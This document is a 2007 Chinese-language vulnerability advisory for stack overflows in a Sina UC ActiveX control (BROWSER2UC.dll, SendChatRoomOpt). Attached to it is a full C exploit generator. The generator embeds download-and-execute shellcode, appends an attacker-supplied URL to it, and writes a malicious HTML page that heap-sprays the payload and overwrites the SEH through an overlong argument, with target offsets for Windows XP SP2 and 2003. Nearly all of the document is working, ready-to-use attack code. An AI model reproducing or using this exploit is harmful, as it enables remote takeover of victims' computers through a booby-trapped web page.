//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 新浪UC ActiveX多个远程栈溢出漏洞
//
// Sowhat of Nevis Labs
// 日期: 2007.01.09
//
// http://www.nevisnetworks.com
// http://secway.org/advisory/20070109EN.txt
// http://secway.org/advisory/20070109CN.txt
//
// CVE: 暂无
//
// 厂商
//
// Sina Inc.
//
// 受影响的版本:
// Sina UC <=UC2006
//
// Overview:
// 新浪UC是中国非常流行的IM工具之一
//
// http://www.51uc.com
//
// 细节:
//
// 漏洞的起因是Sina UC的多个ActiveX控件的参数缺乏必要的验证,攻击者构造恶意网页,可以远程完全控制安装了Sina UC
// 的用户的计算机,
//
// 多个控件存在栈溢出问题,包括但不限于:
//
// 1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384
// C:\Program Files\sina\UC\ActiveX\BROWSER2UC.dll
//
// Sub SendChatRoomOpt (
// ByVal astrVerion As String ,
// ByVal astrUserID As String ,
// ByVal asDataType As Integer ,
// ByVal alTypeID As Long
// )
//
// 当第1个参数是一个超常字符串时,发生栈溢出,SEH被覆盖,攻击者可以执行任意代码
////////////////////////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Sina UC 2006 Activex SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo,ph4nt0morg
//////////////////////////////////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>
FILE *fp = NULL;
char *file = "fuck_uc.html";
char *url = NULL;
unsigned char sc[] =
"\x60\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x70"
"\x08\x81\xec\x00\x04\x00\x00\x8b\xec\x56\x68\x8e\x4e\x0e\xec\xe8"
"\xff\x00\x00\x00\x89\x45\x04\x56\x68\x98\xfe\x8a\x0e\xe8\xf1\x00"
"\x00\x00\x89\x45\x08\x56\x68\x25\xb0\xff\xc2\xe8\xe3\x00\x00\x00"
"\x89\x45\x0c\x56\x68\xef\xce\xe0\x60\xe8\xd5\x00\x00\x00\x89\x45"
"\x10\x56\x68\xc1\x79\xe5\xb8\xe8\xc7\x00\x00\x00\x89\x45\x14\x40"
"\x80\x38\xc3\x75\xfa\x89\x45\x18\xe9\x08\x01\x00\x00\x5e\x89\x75"
"\x24\x8b\x45\x04\x6a\x01\x59\x8b\x55\x18\x56\xe8\x8c\x00\x00\x00"
"\x50\x68\x36\x1a\x2f\x70\xe8\x98\x00\x00\x00\x89\x45\x1c\x8b\xc5"
"\x83\xc0\x50\x89\x45\x20\x68\xff\x00\x00\x00\x50\x8b\x45\x14\x6a"
"\x02\x59\x8b\x55\x18\xe8\x62\x00\x00\x00\x03\x45\x20\xc7\x00\x5c"
"\x7e\x2e\x65\xc7\x40\x04\x78\x65\x00\x00\xff\x75\x20\x8b\x45\x0c"
"\x6a\x01\x59\x8b\x55\x18\xe8\x41\x00\x00\x00\x6a\x07\x58\x03\x45"
"\x24\x33\xdb\x53\x53\xff\x75\x20\x50\x53\x8b\x45\x1c\x6a\x05\x59"
"\x8b\x55\x18\xe8\x24\x00\x00\x00\x6a\x00\xff\x75\x20\x8b\x45\x08"
"\x6a\x02\x59\x8b\x55\x18\xe8\x11\x00\x00\x00\x81\xc4\x00\x04\x00"
"\x00\x61\x81\xc4\xdc\x04\x00\x00\x5d\xc2\x24\x00\x41\x5b\x52\x03"
"\xe1\x03\xe1\x03\xe1\x03\xe1\x83\xec\x04\x5a\x53\x8b\xda\xe2\xf7"
"\x52\xff\xe0\x55\x8b\xec\x8b\x7d\x08\x8b\x5d\x0c\x56\x8b\x73\x3c"
"\x8b\x74\x1e\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49\x41"
"\xad\x03\xc3\x56\x33\xf6\x0f\xbe\x10\x3a\xf2\x74\x08\xc1\xce\x0d"
"\x03\xf2\x40\xeb\xf1\x3b\xfe\x5e\x75\xe5\x5a\x8b\xeb\x8b\x5a\x24"
"\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5"
"\x5e\x5d\xc2\x08\x00\xe8\xf3\xfe\xff\xff\x55\x52\x4c\x4d\x4f\x4e"
"\x00";
char * header =
"<!--\n"
"clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384\n"
"C:\Program Files\sina\UC\ActiveX\BROWSER2UC.dll\n\n"
"Sub SendChatRoomOpt (\n"
" ByVal astrVerion As String ,\n"
" ByVal astrUserID As String ,\n"
" ByVal asDataType As Integer ,\n"
" ByVal alTypeID As Long\n"
")\n\n"
"ph4nt0m.org, Code By 云舒 & LuoLuo\n"
"!-->\n\n"
"<html>\n"
"<head>\n"
"<script language=\"javascript\">\n"
"var heapSprayToAddress = 0x0c0c0c0c;\n"
"var shellcode = unescape(\"%u9090\"+\"%u9090\"+ \n";
char * footer =
"\n"
"var heapBlockSize = 0x100000;\n"
"var payLoadSize = shellcode.length * 2;\n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n"
"var spraySlide = unescape(\"%u9090%u9090\");\n\n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n"
"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;\n"
"memory = new Array();\n\n"
"for (i=0;i<heapBlocks;i++)\n{\n"
"\t\tmemory = spraySlide + shellcode;\n}\n"
"function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t"
"while (spraySlide.length*2<spraySlideSize)\n\t"
"{\n\t\tspraySlide += spraySlide;\n\t}\n"
"\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n";
// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i < buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
fprintf(fp, "%s", "\" +\n\"");
}
else
{
fprintf(fp, "%s", "\"");
}
}
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
//把shellcode打印在header后面,然后用 " ) " 闭合
fprintf(fp, "%s", "\");\n");
}
int main( int argc, char *argv[] )
{
if( argc != 3 )
{
printf( "\nUC ActiveX object exp,Code by 云舒 & LuoLuo,ph4nt0morg\n" );
printf( "Usage: %s <url> <os>\n", argv[0] );
printf( " 1 Windows XP SP2 Chinese version,IE 6\n" );
printf( " 2 Windows 2003 standard SP1 Chinese Version, IE 6\n" );
return -1;
}
char seh[1024] = { 0 };
int os = atoi( argv[2] );
int len = 0;
if( os == 1 )
{
len = 3133;
}
else if( os == 2 )
{
len = 3193;
}
sprintf( seh , "var obj = new ActiveXObject(\"BROWSER2UC.BROWSERToUC\");\n\tvar arg1;\n\n<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->\n<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->\n\nfor( var i = 0; i < %d; i ++ )\n{\targ1 += \"A\";\n}arg1=arg1 + unescape(\"%%0c%%0c%%0c%%0c\");\narg2=\"defaultV\";\narg3=1;\narg4=1;\nobj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);\n</script>\n</head>\n</html>", len );
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
return -1;
}
printf("[+] download url:%s\n", url);
fp = fopen( file , "w" );
if( fp == NULL )
{
printf( "Create file error: %d\n", GetLastError() );
return -1;
}
fprintf( fp, "%s", header );
fflush( fp );
char buffer[4096] = { 0 };
int sc_len = sizeof(sc)-1;
memcpy(buffer, sc, sc_len);
memcpy(buffer+sc_len, url, strlen(url));
sc_len += strlen(url)+1;
PrintPayLoad((char *)buffer, sc_len);
fflush( fp );
fprintf( fp, "%s", footer );
fprintf( fp, "%s", seh );
fflush( fp );
fclose( fp );
printf( "Create done!please look %s\n", file );
}
推荐
评论(0条)
